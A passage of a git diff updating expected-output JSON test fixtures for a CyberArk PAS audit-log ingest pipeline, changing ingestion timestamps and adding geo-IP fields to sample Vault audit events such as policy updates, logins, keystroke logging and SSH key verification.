PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: False; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" 
@@ -314,7 +314,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-12-09T13:37:03.416602300Z", + "ingested": "2021-12-14T14:42:31.833285843Z", "original": "\u003c5\u003e1 2021-03-14T12:04:53Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:04:53\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:04:53Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 500; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: False; 
AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:04:53\",\"IsoTimestamp\":\"2021-03-14T12:04:53Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 500; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 
90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: False; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log-expected.json index 950d83a79c9..5719943ef0b 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log-expected.json @@ -7,6 +7,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -49,7 +58,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:37:03.891416600Z", + "ingested": "2021-12-14T14:42:32.347121200Z", "original": "\u003c7\u003e1 2021-03-10T18:42:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:42:36\",\"IsoTimestamp\":\"2021-03-10T18:42:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"4\",\"Desc\":\"User Authentication\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"User Authentication\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"User Authentication\",\"GatewayStation\":\"\"}}}", "code": "4", "kind": "event", 
@@ -125,7 +134,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-09T13:37:03.891424700Z", + "ingested": "2021-12-14T14:42:32.347123882Z", "original": "\u003c7\u003e1 2021-03-11T18:03:43Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:03:43\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:03:43Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e4\u003c/MessageID\u003e\\n \u003cDesc\u003eUser Authentication\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUser Authentication\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUser Authentication\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:03:43\",\"IsoTimestamp\":\"2021-03-11T18:03:43Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"4\",\"Desc\":\"User Authentication\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"User 
Authentication\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"User Authentication\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "4", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-411-window-title.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-411-window-title.log-expected.json index 2bf4a12105e..58d699ff81f 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-411-window-title.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-411-window-title.log-expected.json 
@@ -95,7 +95,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:04.116666Z", + "ingested": "2021-12-14T14:42:32.628459893Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e411\u003c/MessageID\u003e\\n \u003cDesc\u003eWindow Title\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eadm2\u003c/Issuer\u003e\\n \u003cAction\u003eWindow Title\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eWindows\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.5\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=shutdown.exe, Shutdown Event Tracker;ConnectionComponentId=PSM-RDP;DstHost=dbserver.cyberark.local;ProcessId=4144;ProcessName=shutdown.exe;Protocol=RDP;PSMID=PSMServer_88f6598;RDPOffset=218B;SessionID=a1f46060-1de4-4f56-a8ba-71fdf3140ac1;SrcHost=10.2.0.6;User=Administrator2;VIDOffset=12T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eWindow Title\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WIN-SERVER-LOCAL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"Administrator2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"dbserver.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"DBServer\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1604944215\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"EvilCorp\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"411\",\"Desc\":\"Window Title\",\"Severity\":\"Info\",\"Issuer\":\"adm2\",\"Action\":\"Window Title\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Windows\",\"File\":\"Root\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\",\"Station\":\"10.2.0.5\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=shutdown.exe, Shutdown Event Tracker;ConnectionComponentId=PSM-RDP;DstHost=dbserver.cyberark.local;ProcessId=4144;ProcessName=shutdown.exe;Protocol=RDP;PSMID=PSMServer_88f6598;RDPOffset=218B;SessionID=a1f46060-1de4-4f56-a8ba-71fdf3140ac1;SrcHost=10.2.0.6;User=Administrator2;VIDOffset=12T;\",\"IsoTimestamp\":\"2021-03-16T17:11:42Z\",\"Message\":\"Window 
Title\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WIN-SERVER-LOCAL\"},{\"Name\":\"UserName\",\"Value\":\"Administrator2\"},{\"Name\":\"Address\",\"Value\":\"dbserver.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"LogonDomain\",\"Value\":\"DBServer\"},{\"Name\":\"SequenceID\",\"Value\":\"1\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1604944215\"},{\"Name\":\"Customer\",\"Value\":\"EvilCorp\"}]}}}}", "code": "411", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-412-keystroke-logging.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-412-keystroke-logging.log-expected.json index 51effe33ff9..417eea8c57e 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-412-keystroke-logging.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-412-keystroke-logging.log-expected.json 
@@ -101,7 +101,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:04.279820500Z", + "ingested": "2021-12-14T14:42:32.813156345Z", "original": "\u003c5\u003e1 2021-03-25T11:29:37Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 07:29:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T11:29:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e412\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eMSSQL\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-MSSql-epmsvr01.cybr.com-sa\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SHOW DATABASES\\\\;;ConnectionComponentId=PSM-SQLServerMgmtStudio;DataBase=master;DstHost=tgtsvr01.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=975edc19-ad10-4b42-8098-f26afab40fac;SrcHost=127.0.0.1;TXTOffset=702B;User=sa;VIDOffset=33T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"MSSql\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"sa\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"tgtsvr01.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"master\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580240\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011980\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"SQL;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 07:29:37\",\"IsoTimestamp\":\"2021-03-25T11:29:37Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"412\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"MSSQL\",\"File\":\"Root\\\\Database-MSSql-epmsvr01.cybr.com-sa\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SHOW 
DATABASES\\\\;;ConnectionComponentId=PSM-SQLServerMgmtStudio;DataBase=master;DstHost=tgtsvr01.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=975edc19-ad10-4b42-8098-f26afab40fac;SrcHost=127.0.0.1;TXTOffset=702B;User=sa;VIDOffset=33T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"MSSql\"},{\"Name\":\"UserName\",\"Value\":\"sa\"},{\"Name\":\"Address\",\"Value\":\"tgtsvr01.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"master\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580240\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011980\"},{\"Name\":\"Tags\",\"Value\":\"SQL;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "412", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-414-cpm-verify-ssh-key.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-414-cpm-verify-ssh-key.log-expected.json index 6c06eebed5b..da01d78848f 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-414-cpm-verify-ssh-key.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-414-cpm-verify-ssh-key.log-expected.json 
@@ -93,7 +93,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:04.451006400Z", + "ingested": "2021-12-14T14:42:33.061544998Z", "original": "\u003c5\u003e1 2021-03-25T10:04:06Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 06:04:06\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T10:04:06Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e414\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify SSH Key\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify SSH Key\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux SSH Keys\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-rhel7.cybr.com-firecall1\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eVerificationPeriod\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=rhel7.cybr.com;username=firecall1;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify SSH Key\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"firecall1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"rhel7.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Name\\\" Value=\\\"Operating System-UnixSSH-rhel7.cybr.com-root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Folder\\\" Value=\\\"Root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ExtraPass3Safe\\\" Value=\\\"Linux Root\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616666646\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1582315464\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 06:04:06\",\"IsoTimestamp\":\"2021-03-25T10:04:06Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"414\",\"Desc\":\"CPM Verify SSH Key\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify SSH Key\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux SSH Keys\",\"File\":\"Root\\\\Operating 
System-UnixSSHKeys-rhel7.cybr.com-firecall1\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"VerificationPeriod\",\"ExtraDetails\":\"address=rhel7.cybr.com;username=firecall1;\",\"Message\":\"CPM Verify SSH Key\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"firecall1\"},{\"Name\":\"Address\",\"Value\":\"rhel7.cybr.com\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"SequenceID\",\"Value\":\"2\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"ExtraPass3Name\",\"Value\":\"Operating System-UnixSSH-rhel7.cybr.com-root\"},{\"Name\":\"ExtraPass3Folder\",\"Value\":\"Root\"},{\"Name\":\"ExtraPass3Safe\",\"Value\":\"Linux Root\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616666646\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1582315464\"},{\"Name\":\"Tags\",\"Value\":\"SSH\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "414", "kind": "event", 